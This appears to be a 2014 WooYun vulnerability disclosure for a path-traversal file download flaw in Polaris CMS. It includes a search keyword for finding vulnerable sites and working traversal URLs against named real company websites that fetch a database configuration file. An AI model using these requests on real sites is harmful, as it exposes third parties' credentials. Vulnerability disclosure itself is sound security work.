漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-05-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
任意文件下载
详细说明:
存在该漏洞的cms是 Polaris cms
google关键字:downfile.php?direct 就可以找到许多,有的找不到的 请看我下面提供的列表即可:)
主要是当开启了下载模块:即download.php。
对传入的参数没有进行很好的过滤。产生了任意文件下载。
来看看实例1
http://www.sigmarobot.com/
开启了下载模块之后我们访问如下链接:
文件源码妥妥的,躺在了 我们的文件夹中
呀。。这根本没有过滤啊!
通过对文件系统的首页下载分析。得到数据库配置文件:
utility.php
好咯,既然在根目录,我们直接就down回来看看
http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php
一切都那么自然。。
漏洞证明:
好了,下面来一波:
http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php
http://www.tan-star.com.tw/downfile.php?direct=../&file=utility.php
http://www.injection.com.tw/downfile.php?direct=../&file=utility.php
全部贴图有点累,就贴上面这些吧。
下面这些也是可以下载的哦:
www.chaowei.com.tw/downfile.php?direct=../&file=downfile.php
www.injection.com.tw/downfile.php?direct=../&file=downfile.php
www.webcontrol.com.tw/downfile.php?direct=../&file=downfile.php
http://www.sencar.com.tw/downfile.php?direct=../&file=downfile.php
http://www.avitaplas.com/downfile.php?direct=../&file=downfile.php
http://www.human-video.com/downfile.php?direct=../&file=downfile.php
不一一列举了。。。
这里有一个列表:
http://www.polaris.net.tw/tw/webdesign_list.html 得注意这个漏洞的条件只需要网站系统开启了下载模块 download.php即可了!
看了下,影响较多台湾小企业网站,大陆只是占少数。
修复方案:
对传入参数进行有效性验证。
版权声明:转载请注明来源 梧桐雨@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝